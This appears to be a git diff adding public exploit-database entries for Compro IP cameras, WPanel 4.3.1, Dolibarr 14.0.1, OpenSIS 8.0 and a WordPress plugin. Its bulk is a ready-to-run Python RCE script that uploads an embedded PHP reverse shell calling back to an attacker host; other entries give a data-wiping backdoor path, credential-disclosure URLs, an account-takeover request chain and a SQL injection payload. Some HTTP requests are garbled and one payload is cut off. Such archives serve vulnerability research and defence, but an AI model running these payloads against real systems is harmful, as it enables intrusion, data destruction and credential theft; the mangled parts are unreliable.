diff --git a/exploits/hardware/webapps/50250.txt b/exploits/hardware/webapps/50250.txt
new file mode 100644
index 000000000..1bcad1748
--- /dev/null
+++ b/exploits/hardware/webapps/50250.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Compro Technology IP Camera - 'killps.cgi' Denial-of-Service (DoS)
+# Date: 2021-09-30
+# Exploit Author: icekam,xiao13,Rainbow,tfsec
+# Software Link: http://www.comprotech.com.hk/
+# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
+# CVE : CVE-2021-40378
+
+There is a backdoor prefabricated in the device in this path. Accessing the
+file through the browser after logging in will cause the device to delete
+all data (including the data of the camera itself).
+
+Payload:Visit this page after logging in
+/cgi-bin/support/killps.cgi
+
+please refer to:
+https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50251.txt b/exploits/hardware/webapps/50251.txt
new file mode 100644
index 000000000..bd1d8246c
--- /dev/null
+++ b/exploits/hardware/webapps/50251.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated)
+# Date: 2021-09-30
+# Exploit Author: icekam,xiao13,Rainbow,tfsec
+# Software Link: http://www.comprotech.com.hk/
+# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
+# CVE : CVE-2021-40379
+
+Some devices have unauthorized access to rstp, which can lead to the
+leakage of surveillance video stream information.
+
+Payload:rstp://.../medias2
+
+please refer to:
+https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50252.txt b/exploits/hardware/webapps/50252.txt
new file mode 100644
index 000000000..08dde234b
--- /dev/null
+++ b/exploits/hardware/webapps/50252.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Compro Technology IP Camera - 'Multiple' Credential Disclosure
+# Date: 2021-09-30
+# Exploit Author: icekam,xiao13,Rainbow,tfsec
+# Software Link: http://www.comprotech.com.hk/
+# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
+# CVE : CVE-2021-40380
+
+There are unauthorized access vulnerabilities, which can lead to the
+disclosure of device administrator usernames and passwords or rstp
+usernames and passwords.
+
+Payload:
+
+/cgi-bin/cameralist/cameralist.cgi
+/cgi-bin/cameralist/setcamera.cgi?id=*
+
+please refer to:
+https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50253.txt b/exploits/hardware/webapps/50253.txt
new file mode 100644
index 000000000..9de522738
--- /dev/null
+++ b/exploits/hardware/webapps/50253.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Compro Technology IP Camera - ' index_MJpeg.cgi' Stream Disclosure
+# Date: 2021-09-30
+# Exploit Author: icekam,xiao13,Rainbow,tfsec
+# Software Link: http://www.comprotech.com.hk/
+# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
+# CVE : CVE-2021-40381
+
+Has an unauthorized access vulnerability, which can lead to unauthorized
+access to the camera video page.
+
+Payload:
+
+/cgi-bin/view/index_MJpeg.cgi
+
+please refer to:
+https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50254.txt b/exploits/hardware/webapps/50254.txt
new file mode 100644
index 000000000..e9749bfa3
--- /dev/null
+++ b/exploits/hardware/webapps/50254.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure
+# Date: 2021-09-30
+# Exploit Author: icekam,xiao13,Rainbow,tfsec
+# Software Link: http://www.comprotech.com.hk/
+# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
+# CVE : CVE-2021-40382
+
+There is an unauthorized access vulnerability, which can lead to
+unauthorized access to camera video screenshots.
+
+Payload:
+
+/mjpegStreamer.cgi
+
+please refer to:
+https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50255.txt b/exploits/multiple/webapps/50255.txt
new file mode 100644
index 000000000..dd54d97dc
--- /dev/null
+++ b/exploits/multiple/webapps/50255.txt
@@ -0,0 +1,265 @@
+# Exploit Title: WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)
+# Date: 07/06/2021
+# Exploit Author: Sentinal920
+# Vendor Homepage: https://github.com/wpanel
+# Software Link: https://github.com/wpanel/wpanel4-cms
+# Version: 4.3.1
+# Tested on: Linux
+
+import requests
+import random,string
+
+
+# Change This
+###################################
+url = 'http://192.168.182.134:8080'
+email = 'admin@localhost.com'
+password = 'admin'
+###################################
+
+# PHP reverse shell used: https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php
+# Works on linux/windows/mac
+
+###########################################################################
+# Make sure to change lhost and lport in the reverse shell below (Line 223)
+###########################################################################
+
+
+# Get_Cookies
+r = requests.get(url)
+r2 = requests.get(url,cookies=r.cookies)
+cookie = r2.cookies['wpanel_csrf_cookie']
+name = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(9))
+
+payload = '''
+-----------------------------45668787242378192391383974033
+Content-Disposition: form-data; name="wpanel_csrf_token"
+
+'''+cookie+'''
+-----------------------------45668787242378192391383974033
+Content-Disposition: form-data; name="titulo"
+
+'''+name+'''
+-----------------------------45668787242378192391383974033
+Content-Disposition: form-data; name="descricao"
+
+'''+name+'''
+-----------------------------45668787242378192391383974033
+Content-Disposition: form-data; name="tags"
+
+tesad
+-----------------------------45668787242378192391383974033
+Content-Disposition: form-data; name="userfile"; filename="php-reverse-shell.php"
+Content-Type: application/x-php
+
+ array('pipe', 'r'), // shell can read from STDIN
+ 1 => array('pipe', 'w'), // shell can write to STDOUT
+ 2 => array('pipe', 'w') // shell can write to STDERR
+ );
+ private $options = array(); // proc_open() options
+ private $buffer = 1024; // read/write buffer size
+ private $clen = 0; // command length
+ private $error = false; // stream read/write error
+ public function __construct($addr, $port) {
+ $this->addr = $addr;
+ $this->port = $port;
+ }
+ private function detect() {
+ $detected = true;
+ if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
+ $this->os = 'LINUX';
+ $this->shell = '/bin/sh';
+ } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
+ $this->os = 'WINDOWS';
+ $this->shell = 'cmd.exe';
+ $this->options['bypass_shell'] = true; // we do not want a shell within a shell
+ } else {
+ $detected = false;
+ echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
+ }
+ return $detected;
+ }
+ private function daemonize() {
+ $exit = false;
+ if (!function_exists('pcntl_fork')) {
+ echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
+ } else if (($pid = @pcntl_fork()) < 0) {
+ echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
+ } else if ($pid > 0) {
+ $exit = true;
+ echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
+ } else if (posix_setsid() < 0) {
+ // once daemonized you will actually no longer see the script's dump
+ echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
+ } else {
+ echo "DAEMONIZE: Completed successfully!\n";
+ }
+ return $exit;
+ }
+ private function settings() {
+ @error_reporting(0);
+ @set_time_limit(0); // do not impose the script execution time limit
+ @umask(0); // set the file/directory permissions - 666 for files and 777 for directories
+ }
+ private function dump($data) {
+ $data = str_replace('<', '<', $data);
+ $data = str_replace('>', '>', $data);
+ echo $data;
+ }
+ private function read($stream, $name, $buffer) {
+ if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
+ $this->error = true; // set global error flag
+ echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n";
+ }
+ return $data;
+ }
+ private function write($stream, $name, $data) {
+ if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
+ $this->error = true; // set global error flag
+ echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n";
+ }
+ return $bytes;
+ }
+ // read/write method for non-blocking streams
+ private function rw($input, $output, $iname, $oname) {
+ while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
+ if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
+ $this->dump($data); // script's dump
+ }
+ }
+ // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
+ // we must read the exact byte length from a stream and not a single byte more
+ private function brw($input, $output, $iname, $oname) {
+ $size = fstat($input)['size'];
+ if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) {
+ // for some reason Windows OS pipes STDIN into STDOUT
+ // we do not like that
+ // we need to discard the data from the stream
+ while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
+ $this->clen -= $bytes;
+ $size -= $bytes;
+ }
+ }
+ while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
+ $size -= $bytes;
+ $this->dump($data); // script's dump
+ }
+ }
+ public function run() {
+ if ($this->detect() && !$this->daemonize()) {
+ $this->settings();
+
+ // ----- SOCKET BEGIN -----
+ $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
+ if (!$socket) {
+ echo "SOC_ERROR: {$errno}: {$errstr}\n";
+ } else {
+ stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS
+
+ // ----- SHELL BEGIN -----
+ $process = @proc_open($this->shell, $this->descriptorspec, $pipes, '/', null, $this->options);
+ if (!$process) {
+ echo "PROC_ERROR: Cannot start the shell\n";
+ } else {
+ foreach ($pipes as $pipe) {
+ stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
+ }
+
+ // ----- WORK BEGIN -----
+ @fwrite($socket, "SOCKET: Shell has connected! PID: " . proc_get_status($process)['pid'] . "\n");
+ do {
+ if (feof($socket)) { // check for end-of-file on SOCKET
+ echo "SOC_ERROR: Shell connection has been terminated\n"; break;
+ } else if (feof($pipes[1]) || !proc_get_status($process)['running']) { // check for end-of-file on STDOUT or if process is still running
+ echo "PROC_ERROR: Shell process has been terminated\n"; break; // feof() does not work with blocking streams
+ } // use proc_get_status() instead
+ $streams = array(
+ 'read' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
+ 'write' => null,
+ 'except' => null
+ );
+ $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], null); // wait for stream changes | will not wait on Windows OS
+ if ($num_changed_streams === false) {
+ echo "STRM_ERROR: stream_select() failed\n"; break;
+ } else if ($num_changed_streams > 0) {
+ if ($this->os === 'LINUX') {
+ if (in_array($socket , $streams['read'])) { $this->rw($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
+ if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
+ if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
+ } else if ($this->os === 'WINDOWS') {
+ // order is important
+ if (in_array($socket, $streams['read'])) { $this->rw ($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
+ if (fstat($pipes[2])['size']/*-------*/) { $this->brw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
+ if (fstat($pipes[1])['size']/*-------*/) { $this->brw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
+ }
+ }
+ } while (!$this->error);
+ // ------ WORK END ------
+
+ foreach ($pipes as $pipe) {
+ fclose($pipe);
+ }
+ proc_close($process);
+ }
+ // ------ SHELL END ------
+
+ fclose($socket);
+ }
+ // ------ SOCKET END ------
+
+ }
+ }
+}
+echo '
';
+// change the host address and/or port number as necessary
+$sh = new Shell('192.168.182.136', 9000);
+$sh->run();
+unset($sh);
+// garbage collector requires PHP v5.3.0 or greater
+// @gc_collect_cycles();
+echo '
';
+?>
+
+
+-----------------------------45668787242378192391383974033
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------45668787242378192391383974033--
+
+
+'''
+data = 'wpanel_csrf_token='+cookie+'&email='+email+'&password='+password
+headers = {'Content-Type': 'application/x-www-form-urlencoded'}
+# Login_as_admin
+r3 = requests.post(url+'/index.php/admin/login',cookies=r.cookies,headers=headers,data=data)
+
+
+def exploit_gallery():
+
+ # Adding_Reverse_Shell
+ headers2 = {'Content-Type': 'multipart/form-data; boundary=---------------------------45668787242378192391383974033'}
+ r4 = requests.post(url + '/index.php/admin/galleries/add',cookies=r.cookies,headers=headers2,data=payload)
+
+ print('')
+ print('Shell Uploaded as: '+name)
+ print('')
+ print('Visit: '+url+'/index.php/admin/galleries')
+ print('OR')
+ print('Visit: '+url+'/index.php/galleries')
+ print('')
+
+exploit_gallery()
+
+
+#def exploit_post():
+#def exloit_pages():
+#def dashboard_avatar_image():
\ No newline at end of file
diff --git a/exploits/php/webapps/50248.txt b/exploits/php/webapps/50248.txt
new file mode 100644
index 000000000..f422d58a0
--- /dev/null
+++ b/exploits/php/webapps/50248.txt
@@ -0,0 +1,192 @@
+# Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation
+# Date: April 8, 2021
+# Exploit Author: Vishwaraj101
+# Vendor Homepage: https://www.dolibarr.org/
+# Affected Version: <= 14.0.1
+# Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d
+
+*Summary:*
+Using the below chain of issues attacker can compromise any dolibarr
+user account including the admin.
+
+*Poc:*
+
+ 1. Visit https://example.com/api/index.php/login?login=demo&password=demo
+ try to login with a test user with 0 permissons or less permissions.
+ 2. We will receive an api token in return.
+ 3. Next we need to fetch the user id of the user whose account we want
+ to own.
+
+
+
+*First we need to fetch the user id of the admin user using the below api.*
+
+*Request1:*
+
+GET /api/index.php/users/login/admin HTTP/1.1Host:
+preview2.dolibarr.ohttps://preview2.dolibarr.org/api/index.php/users/login/adminrg
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
+root@tqn9xk6rn6fq8x9ijbmpouosrjxan3srh.burpcollaborator.netAccept:
+application/json
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Connection: close
+
+*This will return the user details using the username. Now update the
+victim user account via below api (include the json body received from the
+previous request1 and replace the email id from below json to the attacker
+controlled email)*
+
+
+*Request2:*PUT /api/index.php/users/*12* HTTP/1.1
+
+Host: preview2.dolibarr.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1;
+WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87
+Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.netAccept:
+application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip,
+deflateDOLAPIKEY: test1337Origin:
+https://preview2.dolibarr.orgConnection: closeReferer:
+http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/refContent-Length:
+3221
+{
+ "id": "12",
+ "statut": "1",
+ "employee": "1",
+ "civility_code": null,
+ "gender": "woman",
+ "birth": 495583200,
+ "email": "*attacker@example.com *",
+ "personal_email": "",
+ "socialnetworks": {
+ "facebook": "",
+ "skype": "",
+ "twitter": "",
+ "linkedin": "",
+ "instagram": "",
+ "snapchat": "",
+ "googleplus": "",
+ "youtube": "",
+ "whatsapp": "",
+ "tumblr": "",
+ "vero": "",
+ "viadeo": "",
+ "slack": "",
+ "xing": "",
+ "meetup": "",
+ "pinterest": "",
+ "flickr": "",
+ "500px": "",
+ "giphy": "",
+ "gifycat": "",
+ "dailymotion": "",
+ "vimeo": "",
+ "periscope": "",
+ "twitch": "",
+ "discord": "",
+ "wikipedia": "",
+ "reddit": "",
+ "quora": "",
+ "tripadvisor": "",
+ "mastodon": "",
+ "diaspora": "",
+ "viber": ""
+ },
+ "job": "Admin Technical",
+ "signature": "",
+ "address": "",
+ "zip": "",
+ "town": "",
+ "state_id": null,
+ "state_code": null,
+ "state": null,
+ "office_phone": "",
+ "office_fax": "",
+ "user_mobile": "",
+ "personal_mobile": "",
+ "admin": "1",
+ "login": "admin",
+ "entity": "0",
+ "datec": 1507187386,
+ "datem": 1617819214,
+ "socid": null,
+ "contact_id": null,
+ "fk_member": null,
+ "fk_user": "11",
+ "fk_user_expense_validator": null,
+ "fk_user_holiday_validator": null,
+ "clicktodial_url": null,
+ "clicktodial_login": null,
+ "clicktodial_poste": null,
+ "datelastlogin": 1617816891,
+ "datepreviouslogin": 1617815935,
+ "datestartvalidity": "",
+ "dateendvalidity": "",
+ "photo": "com.jpg",
+ "lang": "fr_FR",
+ "rights": {
+ "user": {
+ "user": {},
+ "self": {}
+ }
+ },
+ "conf": {},
+ "users": [],
+ "parentof": null,
+ "accountancy_code": "",
+ "weeklyhours": "39.00000000",
+ "color": "",
+ "dateemployment": "",
+ "dateemploymentend": "",
+ "default_c_exp_tax_cat": null,
+ "default_range": null,
+ "fk_warehouse": null,
+ "import_key": null,
+ "array_options": [],
+ "array_languages": null,
+ "linkedObjectsIds": null,
+ "canvas": null,
+ "fk_project": null,
+ "contact": null,
+ "thirdparty": null,
+ "user": null,
+ "origin": null,
+ "origin_id": null,
+ "ref": "12",
+ "ref_ext": null,
+ "status": null,
+ "country": null,
+ "country_id": null,
+ "country_code": "",
+ "region_id": null,
+ "barcode_type": null,
+ "barcode_type_code": null,
+ "barcode_type_label": null,
+ "barcode_type_coder": null,
+ "mode_reglement_id": null,
+ "cond_reglement_id": null,
+ "demand_reason_id": null,
+ "transport_mode_id": null,
+ "cond_reglement": null,
+ "modelpdf": null,
+ "last_main_doc": null,
+ "fk_bank": null,
+ "fk_account": null,
+ "note_public": "",
+ "note_private": "",
+ "note": "",
+ "name": null,
+ "lastname": "Adminson",
+ "firstname": "Alice",
+ "civility_id": null,
+ "date_creation": null,
+ "date_validation": null,
+ "date_modification": null,
+ "specimen": 0,
+ "alreadypaid": null,
+ "liste_limit": 0
+}
+
+This will reset the admin email account to the attacker controlled
+email account, now using the password reset feature attacker will
+reset the admin account password and will gain access to the admin
+account.
\ No newline at end of file
diff --git a/exploits/php/webapps/50249.txt b/exploits/php/webapps/50249.txt
new file mode 100644
index 000000000..68c2a24f4
--- /dev/null
+++ b/exploits/php/webapps/50249.txt
@@ -0,0 +1,30 @@
+# Exploit Title: OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection
+# Date: 09/01/2021
+# Exploit Author: Eric Salario
+# Vendor Homepage: http://www.os4ed.com/
+# Software Link: https://opensis.com/download
+# Version: 8.0
+# Tested on: Windows, Linux
+
+A SQL injection vulnerability exists in the Take Attendance functionality of OS4Ed's OpenSIS 8.0. allows an attacker to inject their own SQL query. The cp_id_miss_attn parameter from TakeAttendance.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request as a user with access to "Take Attendance" functionality to trigger this vulnerability.
+
+Steps to reproduce:
+
+1. Login as "Teacher" and navigate to "Attendance" then "Take Attendance". Capture the request on a web proxy such as BurpSuite
+
+Or just navigate to the URL:
+
+http://localhost/Ajax.php?modn...
+
+Vulnerable parameter: cp_id_miss_attn
+
+SQLi payload: r AND (SELECT 1670 FROM (SELECT(SLEEP(10)))VSpq)
+
+URL with the payload: http://localhost/Ajax.php?modn... AND (SELECT 1670 FROM (SELECT(SLEEP(10)))VSpq)
+&cpv_id_miss_attn=23&ajax=true
+
+2. The page should load depends on the sleep
+
+You can use manual queries to dump database information or use sqlmap.
+
+PoC: https://youtu.be/GGHiPvdPRas
\ No newline at end of file
diff --git a/exploits/php/webapps/50256.txt b/exploits/php/webapps/50256.txt
new file mode 100644
index 000000000..e1a6ec501
--- /dev/null
+++ b/exploits/php/webapps/50256.txt
@@ -0,0 +1,16 @@
+# Exploit Title: WordPress Plugin Duplicate Page 4.4.1 - Stored Cross-Site Scripting (XSS)
+# Date: 02/09/2021
+# Exploit Author: Nikhil Kapoor
+# Software Link: https://wordpress.org/plugins/duplicate-page/
+# Version: 4.4.1
+# Category: Web Application
+# Tested on Windows
+
+How to Reproduce this Vulnerability:
+
+1. Install WordPress 5.7.2
+2. Install and activate Duplicate Page
+3. Navigate to Settings >> Duplicate Page and enter the XSS payload into the Duplicate Post Suffix input field.
+4. Click Save Changes.
+5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
+6. Payload Used: ">